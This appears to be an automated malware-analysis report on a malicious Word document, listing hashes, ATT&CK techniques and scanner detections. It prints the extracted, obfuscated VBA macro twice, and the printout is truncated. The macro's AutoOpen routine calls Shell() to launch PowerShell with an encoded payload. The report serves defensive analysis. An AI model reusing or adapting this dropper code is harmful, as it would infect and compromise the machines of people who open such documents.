Office (OLE) malware analysis — malicious · 6eb19a26ba45626c

MALICIOUS

Office (OLE)

105.0 KB Created: 2018-06-12 22:34:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 9b26a8d4842e1c18590638287d3477c3 SHA-1: bbe06fc2965ff311777e0df99adf535991ad1f3c SHA-256: 6eb19a26ba45626c76cfacc8cedf3fcfc541ceb966634cea37a31d39306a0fe2

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine triggers the zjjcP function, which uses the Shell() function to execute a command. This indicates the document is a dropper designed to download and execute a second-stage payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6582963-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6582963-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13296 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13296 bytes
SHA-256: `cf099ee166fda3c8bfb0f2c14123ad435271756ea106ac1e3e18914b5a65a8fe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DZzrbsQJfAGaL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function zjjcP() On Error Resume Next ViDnv = Tan(4638) DZwNh = EOqHQ MXGNSB = CDbl(sNizbv) VGGMf = lXKNXY jEkbK = Hex(nwzORl * ChrW(BKwYaX + Int(JzzHi * Rnd(54645)) * JpNsp * Log(89804 * KncCop - aYrpb + Fix(51)))) wbYlnA = Tan(12639) mGczh = Tan(40728) JjVbqH = WVWlhJ YGSDjS = CDbl(QbFpoR) jzEHU = RoVOkm FDPBS = Hex(iOAKuw * ChrW(vsHPm + Int(qSpVR * Rnd(58918)) * fRjkE * Log(35683 * LcMMEW - mJjpKI + Fix(51)))) iYjGb = Tan(66417) zjjcP = bcJcbQBV + Shell(sMNWUiVWP + Chr(YYwVShGMr + vbKeyP + INXoDzCi) + "owers" + YDcGmFaCGBa + JHupjV + MvtLHpW + mQhhjK + EWPpXOzqX + TKDFE, 20091 - 20091) oPhzWF = Tan(34540) iPGbB = SfvLPL IJjGW = CDbl(wsCick) WNfOi = ZYfQi GaQslu = Hex(XrjGB * ChrW(AJVUbl + Int(rAUFAj * Rnd(55784)) * lfdszX * Log(30521 * fzQjP - JqGdX + Fix(51)))) IDDDfE = Tan(83481) End Function Sub Autoopen() On Error Resume Next GKsFR = Tan(27567) MCNDUk = pUKBOf iwWIvp = CDbl(bZNtfK) VHLRB = zntZDz Nisdp = Hex(OcMVw * ChrW(YCkdz + Int(oaYUN * Rnd(98929)) * NDtqEw * Log(11372 * UVtjjD - vmIlO + Fix(51)))) cYNKtP = Tan(28548) zjjcP vsVtt = Tan(54951) UlHYq = DhrwQ UimMb = CDbl(okfjjL) raZcXn = aLbBBM WYqWN = Hex(HusJjt * ChrW(FscoE + Int(rzwiET * Rnd(17543)) * jJDkKO * Log(24231 * LoKTh - wiPwd + Fix(51)))) kiimwF = Tan(41636) End Sub Attribute VB_Name = "YulDEDbkoZ" Function YDcGmFaCGBa() On Error Resume Next JkGrf = Tan(34909) Xaffq = rABKI YHitZE = CDbl(wFZwj) LuqZN = rXijua AJbiMc = Hex(tHMfqh * ChrW(PTwzdv + Int(fiAao * Rnd(23369)) * RpXkS * Log(81486 * FXbNT - SDhLjj + Fix(51)))) bDklQ = Tan(59349) VWzAKpQI = "HeLL" + " -e KAAgA" + "E4AZQ" + "B3AC0ATwBiAE" + "oARQBjA" VfaDY = Tan(32168) cSovX = jKwWkK BbzprH = CDbl(pNEmU) bhazXo = fqksP pcRHN = Hex(FhOuh * ChrW(MQQiON + Int(bjPBj * Rnd(98495)) * vHSLqE * Log(49173 * SXXGqk - GNnsM + Fix(51)))) YmAbW = Tan(80475) AlUGMzd = "FQAIAB" + "pAG8ALgBDAG8ATQ" + "BwAHI" + "AZ" + "QBTAHMAaQ" + "Bv" + "AG4ALgBEAEUAZg" + "Bs" + "AGEAdABFAFMA" cZaiIO = Tan(11060) PCDdLj = sGHWSM COrnnW = CDbl(RjTOk) tzpwc = QrKkPA butTAX = Hex(zWMrUb * ChrW(dzTjOa + Int(EvRJun * Rnd(93424)) * sdbmIv * Log(51755 * PTrJE - kwdAv + Fix(51)))) tqABaB = Tan(43467) iHjQNP = "dABS" + "AEUAQQBN" + "ACgAIABbAFMAe" + "QBzAFQARQ" + "BNAC4ASQ" + "BvAC4ATQBlAG0" cKFkfN = Tan(58368) PiSnCa = PWQYi TfurJ = CDbl(BdZLHZ) vEOGir = BiuhIl mkiJc = Hex(oJfLtV * ChrW(cFpWL + Int(afzBQ * Rnd(74477)) * qIkkMi * Log(46166 * OsvCf - nmZDNI + Fix(51)))) PwsXW = Tan(89645) PBoHNAvk = "ATwBSAHkAcwBUAH" + "IARQB" + "BAE0AXQ" + "AgAFsAUwBZAHMA" + "VABlAG" + "0ALgBjAG8Abg" YDcGmFaCGBa = VWzAKpQI + AlUGMzd + iHjQNP + PBoHNAvk End Function Function JHupjV() On Error Resume Next onjOW = Tan(89341) fYuwKz = NMuUjd sazCiL = CDbl(MrMpnM) bJjfkm = NiECK BjwDq = Hex(YvNlL * ChrW(iWSjiJ + Int(kMmCN * Rnd(79419)) * qifvtA * Log(37884 * ZctJzW - oNYUmC + Fix(51)))) pjwvf = Tan(49513) obWpj = "BW" + "AGUAcgB0AF0A" + "OgA6AGYA" + "cg" + "BPAG0AQgBhAFMAR" + "QA2" + "ADQAcwBUA" + "FIA" + "aQ" PhkNv = Tan(51524) QRsLYw = qnZKAw YitCt = CDbl(pwzzUt) KvIvD = uYvjJO TztXl = Hex(dpqCrL * ChrW(AERSu + Int(iWmuid * Rnd(12211)) * Bwcwj * Log(77271 * HqFcMp - jUsRj + Fix(51)))) vqHdm = Tan(35436) PjzZwH = "BOAGcAKAAgAC" + "cAVgBa" + "AEIAU" + "gBU" + "ADgA" + "SQB3AEYASQBY" jjEOtf = Tan(51048) rNEHXO = OMpiBO SBNtEJ = CDbl(rzMRE) alqjh = orGoJ mCbvn = Hex(RUvOC * ChrW(zaRQA + Int(sqSLS * Rnd(55524)) * GAmaw * Log(22362 * DhRHj - LIAjIM + Fix(51)))) pjGzXr = Tan(84632) MdHFRPT = "AC8AU" + "wBo" + "ACsAV" + "wBqAEUA" + "WABYA" + "FIAVABRA" TtbjwZ = Tan(64278) fuzCp = SIKhED piCGtf = CDbl(uoCET) jnpXk = dFVpJ tsRzn = Hex(moLdLZ * ChrW(FtKIqs + Int(jXNiSm * Rnd(94401)) * ZfUttw * Log(99919 * FwAMRf - GcQtf + Fix(51)))) TwiwOa = Tan(43649) oaOLYi = "GgAcw" + "BwAGcAZwBLA ... (truncated)

SHA-256: cf099ee166fda3c8bfb0f2c14123ad435271756ea106ac1e3e18914b5a65a8fe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DZzrbsQJfAGaL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zjjcP()
On Error Resume Next
ViDnv = Tan(4638)
DZwNh = EOqHQ
MXGNSB = CDbl(sNizbv)
VGGMf = lXKNXY
jEkbK = Hex(nwzORl * ChrW(BKwYaX + Int(JzzHi * Rnd(54645)) * JpNsp * Log(89804 * KncCop - aYrpb + Fix(51))))
wbYlnA = Tan(12639)
mGczh = Tan(40728)
JjVbqH = WVWlhJ
YGSDjS = CDbl(QbFpoR)
jzEHU = RoVOkm
FDPBS = Hex(iOAKuw * ChrW(vsHPm + Int(qSpVR * Rnd(58918)) * fRjkE * Log(35683 * LcMMEW - mJjpKI + Fix(51))))
iYjGb = Tan(66417)
zjjcP = bcJcbQBV + Shell(sMNWUiVWP + Chr(YYwVShGMr + vbKeyP + INXoDzCi) + "owers" + YDcGmFaCGBa + JHupjV + MvtLHpW + mQhhjK + EWPpXOzqX + TKDFE, 20091 - 20091)
oPhzWF = Tan(34540)
iPGbB = SfvLPL
IJjGW = CDbl(wsCick)
WNfOi = ZYfQi
GaQslu = Hex(XrjGB * ChrW(AJVUbl + Int(rAUFAj * Rnd(55784)) * lfdszX * Log(30521 * fzQjP - JqGdX + Fix(51))))
IDDDfE = Tan(83481)
End Function
Sub Autoopen()
On Error Resume Next
GKsFR = Tan(27567)
MCNDUk = pUKBOf
iwWIvp = CDbl(bZNtfK)
VHLRB = zntZDz
Nisdp = Hex(OcMVw * ChrW(YCkdz + Int(oaYUN * Rnd(98929)) * NDtqEw * Log(11372 * UVtjjD - vmIlO + Fix(51))))
cYNKtP = Tan(28548)
zjjcP
vsVtt = Tan(54951)
UlHYq = DhrwQ
UimMb = CDbl(okfjjL)
raZcXn = aLbBBM
WYqWN = Hex(HusJjt * ChrW(FscoE + Int(rzwiET * Rnd(17543)) * jJDkKO * Log(24231 * LoKTh - wiPwd + Fix(51))))
kiimwF = Tan(41636)
End Sub


Attribute VB_Name = "YulDEDbkoZ"
Function YDcGmFaCGBa()
On Error Resume Next
JkGrf = Tan(34909)
Xaffq = rABKI
YHitZE = CDbl(wFZwj)
LuqZN = rXijua
AJbiMc = Hex(tHMfqh * ChrW(PTwzdv + Int(fiAao * Rnd(23369)) * RpXkS * Log(81486 * FXbNT - SDhLjj + Fix(51))))
bDklQ = Tan(59349)
VWzAKpQI = "HeLL" + " -e KAAgA" + "E4AZQ" + "B3AC0ATwBiAE" + "oARQBjA"
VfaDY = Tan(32168)
cSovX = jKwWkK
BbzprH = CDbl(pNEmU)
bhazXo = fqksP
pcRHN = Hex(FhOuh * ChrW(MQQiON + Int(bjPBj * Rnd(98495)) * vHSLqE * Log(49173 * SXXGqk - GNnsM + Fix(51))))
YmAbW = Tan(80475)
AlUGMzd = "FQAIAB" + "pAG8ALgBDAG8ATQ" + "BwAHI" + "AZ" + "QBTAHMAaQ" + "Bv" + "AG4ALgBEAEUAZg" + "Bs" + "AGEAdABFAFMA"
cZaiIO = Tan(11060)
PCDdLj = sGHWSM
COrnnW = CDbl(RjTOk)
tzpwc = QrKkPA
butTAX = Hex(zWMrUb * ChrW(dzTjOa + Int(EvRJun * Rnd(93424)) * sdbmIv * Log(51755 * PTrJE - kwdAv + Fix(51))))
tqABaB = Tan(43467)
iHjQNP = "dABS" + "AEUAQQBN" + "ACgAIABbAFMAe" + "QBzAFQARQ" + "BNAC4ASQ" + "BvAC4ATQBlAG0"
cKFkfN = Tan(58368)
PiSnCa = PWQYi
TfurJ = CDbl(BdZLHZ)
vEOGir = BiuhIl
mkiJc = Hex(oJfLtV * ChrW(cFpWL + Int(afzBQ * Rnd(74477)) * qIkkMi * Log(46166 * OsvCf - nmZDNI + Fix(51))))
PwsXW = Tan(89645)
PBoHNAvk = "ATwBSAHkAcwBUAH" + "IARQB" + "BAE0AXQ" + "AgAFsAUwBZAHMA" + "VABlAG" + "0ALgBjAG8Abg"
YDcGmFaCGBa = VWzAKpQI + AlUGMzd + iHjQNP + PBoHNAvk
End Function
Function JHupjV()
On Error Resume Next
onjOW = Tan(89341)
fYuwKz = NMuUjd
sazCiL = CDbl(MrMpnM)
bJjfkm = NiECK
BjwDq = Hex(YvNlL * ChrW(iWSjiJ + Int(kMmCN * Rnd(79419)) * qifvtA * Log(37884 * ZctJzW - oNYUmC + Fix(51))))
pjwvf = Tan(49513)
obWpj = "BW" + "AGUAcgB0AF0A" + "OgA6AGYA" + "cg" + "BPAG0AQgBhAFMAR" + "QA2" + "ADQAcwBUA" + "FIA" + "aQ"
PhkNv = Tan(51524)
QRsLYw = qnZKAw
YitCt = CDbl(pwzzUt)
KvIvD = uYvjJO
TztXl = Hex(dpqCrL * ChrW(AERSu + Int(iWmuid * Rnd(12211)) * Bwcwj * Log(77271 * HqFcMp - jUsRj + Fix(51))))
vqHdm = Tan(35436)
PjzZwH = "BOAGcAKAAgAC" + "cAVgBa" + "AEIAU" + "gBU" + "ADgA" + "SQB3AEYASQBY"
jjEOtf = Tan(51048)
rNEHXO = OMpiBO
SBNtEJ = CDbl(rzMRE)
alqjh = orGoJ
mCbvn = Hex(RUvOC * ChrW(zaRQA + Int(sqSLS * Rnd(55524)) * GAmaw * Log(22362 * DhRHj - LIAjIM + Fix(51))))
pjGzXr = Tan(84632)
MdHFRPT = "AC8AU" + "wBo" + "ACsAV" + "wBqAEUA" + "WABYA" + "FIAVABRA"
TtbjwZ = Tan(64278)
fuzCp = SIKhED
piCGtf = CDbl(uoCET)
jnpXk = dFVpJ
tsRzn = Hex(moLdLZ * ChrW(FtKIqs + Int(jXNiSm * Rnd(94401)) * ZfUttw * Log(99919 * FwAMRf - GcQtf + Fix(51))))
TwiwOa = Tan(43649)
oaOLYi = "GgAcw" + "BwAGcAZwBLA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.